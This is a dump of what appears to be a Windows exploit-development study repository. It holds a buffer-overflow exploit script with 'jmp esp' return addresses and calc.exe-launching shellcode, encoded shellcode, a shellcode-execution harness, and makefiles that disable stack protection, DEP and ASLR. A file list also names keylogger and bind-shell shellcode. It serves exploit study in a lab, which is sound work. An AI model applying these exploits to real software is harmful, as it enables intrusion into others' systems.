├── .gitattributes ├── .gitignore ├── 01_bufferoverflow ├── CheckPass2 ├── CheckPass2.c ├── CheckPass2.exe ├── CheckPass2.ilk ├── CheckPass2.obj ├── CheckPass2.pdb ├── Exploit_CheckPass2.py ├── LoopTest.py ├── Test_CheckPass2.py ├── exploit.bin ├── makefile └── vc90.pdb ├── 02_bufferoverflow ├── Exploit2_FileDump.py ├── Exploit_FileDump.py ├── FileDump.c ├── FileDump.exe ├── FileDump.obj ├── FileDump.pdb ├── Test_FileDump.py ├── a.exe ├── buffer.txt ├── exploit.bin ├── makefile └── vc90.pdb ├── 03_webserver ├── Exploit_SimpleServer.py ├── SimpleServer.c ├── SimpleServer.exe ├── SimpleServer.o ├── SimpleServer.obj ├── SimpleServer.pdb ├── Test_SimpleServer.py ├── a.exe ├── exploit.bin ├── vc90.pdb └── windowlibのlinux版.JPG ├── 04_UAF ├── a.exe ├── uaf_test.cpp └── uaf_test.o ├── 05_heapspray ├── test.html ├── test02.html └── test02_クラッシュ結果.txt ├── 10_shellcode ├── calc_exec ├── keylogger ├── not0020_calc_exec ├── readMe.txt ├── shell_bind_tcp ├── shellcodeTester.c ├── shellcodeTester_x64.c ├── x64.exe ├── x64_calc_exe.bin ├── x64_shellcode │ ├── hexdump_C.png │ ├── x64_calc_exe.bin │ └── x64_not00_calc_exe.bin ├── x86.exe └── x86_shellcode │ ├── Shell_Bind_Tcp_4444 │ ├── ecx_alphamixed_shell_bind_tcp │ ├── not0020_shell_bind_tcp │ ├── not00_shell_bind_tcp │ └── shell_bind_tcp │ ├── キーロガー │ ├── %temp%log.binに保存される.txt │ ├── keylogger │ └── keylogger.s │ └── 電卓起動 │ ├── calc_exec │ ├── ecx_alphamixed_calc_exec │ ├── not0020_calc_exec │ ├── not00_calc_exec │ └── not0a1a_calc_exec.bin ├── 11_tools ├── JIT無効設定 │ ├── 無効WinDbg.reg │ ├── 無効WinDbg_Wow64.reg │ └── 異常時即座にプログラム終了.reg ├── JIT設定_windows10 │ ├── WinDbg.reg │ ├── WinDbg_Wow64.reg │ └── 異常時解決検索.reg ├── NtTrace-x86 │ └── NtTrace │ │ ├── Gdi32Trace.cfg │ │ ├── NtTrace.cfg │ │ ├── NtTrace.exe │ │ ├── NtTrace.ico │ │ ├── NtTrace.mak │ │ ├── NtTrace.rc │ │ ├── Readme.txt │ │ ├── User32Trace.cfg │ │ ├── dbgCopy.dll │ │ ├── dbgCopy.lib │ │ ├── include │ │ ├── AdjustPriv.h │ │ ├── BasicType.h │ │ ├── DbgHelper.h │ │ ├── 
DbgHelper.inl │ │ ├── DebugDriver.h │ │ ├── DebugPriv.h │ │ ├── EntryPoint.h │ │ ├── Enumerations.h │ │ ├── GetFileNameFromHandle.h │ │ ├── GetModuleBase.h │ │ ├── MsvcExceptions.h │ │ ├── NtDllStruct.h │ │ ├── Options.h │ │ ├── Options.inl │ │ ├── ProcessHelper.h │ │ ├── ReadInt.h │ │ ├── ReadPartialMemory.h │ │ ├── ShowData.h │ │ ├── SimpleTokenizer.h │ │ ├── StrFromWchar.h │ │ ├── SymTagEnum.h │ │ ├── SymbolEngine.h │ │ ├── TrapNtOpcodes.h │ │ ├── buildVersion.h │ │ ├── displayError.h │ │ └── displayError.inl │ │ ├── log.txt │ │ ├── src │ │ ├── DebugDriver.cpp │ │ ├── EntryPoint.cpp │ │ ├── Enumerations.cpp │ │ ├── GetFileNameFromHandle.cpp │ │ ├── GetModuleBase.cpp │ │ ├── NtTrace.cpp │ │ ├── ShowData.cpp │ │ └── SymbolEngine.cpp │ │ └── version.rc ├── PEフォーマット_nx_aslr有無の違い.JPG ├── geany(appdata_roaming) │ ├── filedefs │ │ ├── filetypes.README │ │ ├── filetypes.c │ │ ├── filetypes.common │ │ └── filetypes.python │ ├── geany.conf │ ├── keybindings.conf │ └── templates │ │ └── templates.README ├── mona │ ├── mona-py-the-manual.pdf │ ├── mona_compare │ │ ├── mona_compare.txt │ │ └── シェルコード比較.JPG │ └── mona保存先設定 │ │ ├── mona保存先設定_管理者権限が必要.txt │ │ └── mona設定ファイル.JPG ├── nc111nt │ ├── doexec.c │ ├── generic.h │ ├── getopt.c │ ├── getopt.h │ ├── hobbit.txt │ ├── license.txt │ ├── makefile │ ├── nc.exe │ ├── netcat.c │ └── readme.txt ├── python │ ├── assemble.py │ ├── assemble │ │ ├── temp │ │ └── temp.s │ ├── badchar.py │ ├── bin2str.bat │ ├── bin2str.py │ ├── disassemble.py │ ├── python_コマンドプロンプト.JPG │ ├── pythonパイプ.png │ └── str2sjis.py ├── stracent-x86 │ ├── info.txt │ ├── stFilter.txt │ ├── stracent.exe │ └── straceui.exe └── windbg_pykd │ ├── 01_load_pykd_pyd.png │ ├── 02_pykd_iat_py.png │ ├── SampleBreakPoint.py │ ├── expOneShotBreak.py │ ├── export.py │ ├── iat.py │ ├── iatOneShotBreak.py │ ├── printHeap.py │ ├── python2.7.11は使用不可.txt │ ├── setBP.py │ ├── setFuncBP.py │ ├── winext │ ├── LogManifest.lgm │ ├── Logexts.ini │ ├── bthkd.dll │ ├── dbgeng.dll │ ├── 
dbghelp.dll │ ├── ext.dll │ ├── gpiokd.dll │ ├── hidkd.dll │ ├── jscript9diagdump.dll │ ├── kext.dll │ ├── logexts.dll │ ├── msdia120.dll │ ├── pykd.pyd │ ├── rcdrkd.dll │ ├── srcsrv.dll │ ├── storagekd.dll │ ├── symsrv.dll │ ├── uext.dll │ ├── usb3kd.dll │ ├── usbkd.dll │ ├── wdfkd.dll │ └── 本ファイルの配置場所.png │ └── ブレークポイント例.txt ├── 12_syscall └── printf_syscall_x64 │ ├── 01_NtWriteFile_x64_sysenter.png │ └── 02_NtWriteFile_x64_sysenter.png ├── 13_MinGw_リンカオプション └── mingw_gcc_コンパイル_リンク.png └── 14_VC_リンカオプション ├── TinyWebコンパイルオプション.JPG └── TinyWebリンカオプション.JPG /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # 
Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2 -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.c -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.exe -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.ilk -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.obj -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.pdb -------------------------------------------------------------------------------- /01_bufferoverflow/Exploit_CheckPass2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/Exploit_CheckPass2.py -------------------------------------------------------------------------------- /01_bufferoverflow/LoopTest.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/LoopTest.py -------------------------------------------------------------------------------- /01_bufferoverflow/Test_CheckPass2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/Test_CheckPass2.py -------------------------------------------------------------------------------- /01_bufferoverflow/exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/exploit.bin -------------------------------------------------------------------------------- /01_bufferoverflow/makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cl /Zi /Od /GS- CheckPass2.c /link /nxcompat:no /dynamicbase:no 3 | -------------------------------------------------------------------------------- /01_bufferoverflow/vc90.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/vc90.pdb -------------------------------------------------------------------------------- /02_bufferoverflow/Exploit2_FileDump.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/Exploit2_FileDump.py -------------------------------------------------------------------------------- /02_bufferoverflow/Exploit_FileDump.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/Exploit_FileDump.py -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.c -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.exe -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.obj 
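-------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.pdb -------------------------------------------------------------------------------- /02_bufferoverflow/Test_FileDump.py: --------------------------------------------------------------------------------
#!/usr/bin/python3
# coding: Shift_JIS
import sys
import struct
import os

# Crash-length sweep for the FileDump lab target: for each length i in
# [500, 520) write i bytes of 'A' to buffer.txt and run the target on it,
# printing a banner first so the length at which it crashes can be read
# off the console.  Runs under both Python 2 and 3: the original combined
# a python3 shebang with Python 2 print statements (a SyntaxError on 3),
# and its "-V" shebang flag made the interpreter print its version and
# exit instead of running the file.
for i in range(500, 520):
    print("\n---------------------------------------------------------")
    print("A*{0}".format(i))
    buf = "A" * i
    # 'with' closes the file even if write() raises
    with open("buffer.txt", "w") as f:
        f.write(buf)
    os.system("FileDump.exe buffer.txt")
-------------------------------------------------------------------------------- /02_bufferoverflow/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/a.exe -------------------------------------------------------------------------------- /02_bufferoverflow/buffer.txt: -------------------------------------------------------------------------------- 1 | AAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDD -------------------------------------------------------------------------------- /02_bufferoverflow/exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/exploit.bin 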
-------------------------------------------------------------------------------- /02_bufferoverflow/makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cl /Zi /Od /GS- FileDump.c /link /nxcompat:no /dynamicbase:no 3 | -------------------------------------------------------------------------------- /02_bufferoverflow/vc90.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/vc90.pdb -------------------------------------------------------------------------------- /03_webserver/Exploit_SimpleServer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: UTF-8 3 | import sys 4 | import struct 5 | import os 6 | 7 | #dummy A*508 8 | dummy = "A" * 508 9 | 10 | #jmp esp 11 | baseAddr = int("0x77cb0000",16) #C:\Windows\SysWOW64\ntdll.dll 12 | retAddr = baseAddr + int("0x00062fbd", 16) 13 | 14 | shellcode = "" 15 | shellcode += "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" 16 | shellcode += "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 17 | shellcode += "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 18 | shellcode += "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 19 | shellcode += "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" 20 | shellcode += "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 21 | shellcode += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" 22 | shellcode += "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5" 23 | shellcode += 
"\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 24 | shellcode += "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" 25 | 26 | 27 | buf = dummy + struct.pack(' 2 | 3 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /05_heapspray/test02.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 16 | 17 | 109 | IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC 110 | 111 | 112 | 113 |
||||
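114 | 115 | 116 | -------------------------------------------------------------------------------- /10_shellcode/calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/calc_exec -------------------------------------------------------------------------------- /10_shellcode/keylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/keylogger -------------------------------------------------------------------------------- /10_shellcode/not0020_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/not0020_calc_exec -------------------------------------------------------------------------------- /10_shellcode/readMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/readMe.txt -------------------------------------------------------------------------------- /10_shellcode/shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/shellcodeTester.c: --------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

/*
 * Lab harness: load a raw byte file into a heap buffer and, only after an
 * explicit confirmation, call into it.  The lab makefiles build with
 * /nxcompat:no; with DEP/NX enabled the indirect call at the end faults
 * instead of running, which is that mitigation doing its job.
 *
 * argv[1] : path of the file to load (must be non-empty).
 * Returns 0 when the user declines or after the call returns; 1 on a
 * usage or I/O error, with a message on stderr.
 */
int main(int argc, char ** argv)
{
    int stacktest = 0;
    /* print a stack address so it can be compared with the heap buffer */
    printf("&stacktest = %p\n", (void *)&stacktest);

    if (argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }

    FILE *fp = fopen(argv[1], "rb");
    if (fp == NULL) {
        perror(argv[1]);
        return 1;
    }

    /* file size via seek/tell; ftell() returns -1 on error */
    long size = -1;
    if (fseek(fp, 0, SEEK_END) == 0) {
        size = ftell(fp);
    }
    if (size <= 0 || fseek(fp, 0, SEEK_SET) != 0) {
        fprintf(stderr, "%s: cannot determine file size or file is empty\n", argv[1]);
        fclose(fp);
        return 1;
    }

    char *buf = (char *)malloc((size_t)size);
    if (buf == NULL) {
        fprintf(stderr, "malloc(%ld) failed\n", size);
        fclose(fp);
        return 1;
    }

    /* read exactly size bytes; a short read means buf is not the whole file */
    if (fread(buf, 1, (size_t)size, fp) != (size_t)size) {
        fprintf(stderr, "%s: short read\n", argv[1]);
        free(buf);
        fclose(fp);
        return 1;
    }
    fclose(fp);

    printf("execute shellcode? Y/N\n");

    /* Read a single character: the original scanf("%s") into a lone char
     * was itself a stack buffer overflow.  Accept both cases to match the
     * Y/N prompt (the original only accepted 'y'). */
    char y = 0;
    if (scanf(" %c", &y) == 1 && (y == 'y' || y == 'Y')) {
        (*(void (*)())buf)();
    }
    free(buf);
    return 0;
}
-------------------------------------------------------------------------------- /10_shellcode/shellcodeTester_x64.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/shellcodeTester_x64.c -------------------------------------------------------------------------------- /10_shellcode/x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64.exe -------------------------------------------------------------------------------- /10_shellcode/x64_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x64_shellcode/hexdump_C.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/hexdump_C.png -------------------------------------------------------------------------------- 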
/10_shellcode/x64_shellcode/x64_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/x64_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x64_shellcode/x64_not00_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/x64_not00_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86.exe -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/ecx_alphamixed_shell_bind_tcp: -------------------------------------------------------------------------------- 1 | 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 -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not0020_shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not0020_shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not00_shell_bind_tcp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not00_shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/キーロガー/%temp%log.binに保存される.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/キーロガー/%temp%log.binに保存される.txt -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/キーロガー/keylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/キーロガー/keylogger -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/ecx_alphamixed_calc_exec: -------------------------------------------------------------------------------- 1 | 
IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlixmYwpS0s0cPk9jE01JrpdlKV2DpNkF24LLKv2eDlKD2a8FooGRjQ6tqIo6QKpLlUlE1qlGrdlepo1ZoFmS1zg8b8pPR67LK2r20lKW2gLWqXPlK70pxk5KprTbjFaN00PnkPHEHLKRxq0faHShculW9NkgDLKeQkf4qyop1iPLlkqxOfmfaIWp8KPt5xtwsqmJX7KCMVD2UHbf8nkChEtS1YC0fnkVl2knkPX7lC1IClKtDNkc1HPoy3tut7TCk3kSQCi1JRqkO9ppXQOCjLKB2jKovcm2JVanmK5NY7p5PUPrpcXuankbOK7IohUmkZP85ORF6cXnFNuoMMM9ozuwLtFqltJK09k9pBUS5Mksw5CrRbOPjs0bsIoYE0c51bL2CVNbEpxSUGpAA -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not0020_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not0020_calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not00_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not00_calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not0a1a_calc_exec.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not0a1a_calc_exec.bin -------------------------------------------------------------------------------- /11_tools/JIT無効設定/無効WinDbg.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/無効WinDbg.reg 
-------------------------------------------------------------------------------- /11_tools/JIT無効設定/無効WinDbg_Wow64.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/無効WinDbg_Wow64.reg -------------------------------------------------------------------------------- /11_tools/JIT無効設定/異常時即座にプログラム終了.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/異常時即座にプログラム終了.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/WinDbg.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/WinDbg.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/WinDbg_Wow64.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/WinDbg_Wow64.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/異常時解決検索.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/異常時解決検索.reg -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/NtTrace.exe -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/NtTrace.ico -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.mak: -------------------------------------------------------------------------------- 1 | # $Id: NtTrace.mak 1405 2013-11-12 23:57:17Z Roger $ 2 | 3 | # 4 | # This makefile requires Microsoft Visual Studio 2005 and above, 5 | # for dbghelp.h and the support for manifest files 6 | # 7 | 8 | # COPYRIGHT 9 | # Copyright (C) 2007,2009 by Roger Orr 10 | # 11 | # This software is distributed in the hope that it will be useful, but 12 | # without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | # 15 | # Permission is granted to anyone to make or distribute verbatim 16 | # copies of this software provided that the copyright notice and 17 | # this permission notice are preserved, and that the distributor 18 | # grants the recipient permission for further distribution as permitted 19 | # by this notice. 20 | # 21 | # Comments and suggestions are always welcome. 22 | # Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | all : build NtTrace.exe 25 | 26 | build : 27 | mkdir build 28 | 29 | clean : 30 | @-del NtTrace.exe NtTrace.exe.manifest NtTrace.res *.pdb 31 | @-rd /q /s build 32 | 33 | CCFLAGS = /nologo /MD /W3 /WX /Zi /Iinclude 34 | LINKFLAGS = /link /opt:ref,icf 35 | 36 | {src}.cpp{build}.obj:: 37 | cl $(CCFLAGS) /Fobuild\ /c /EHsc /I. 
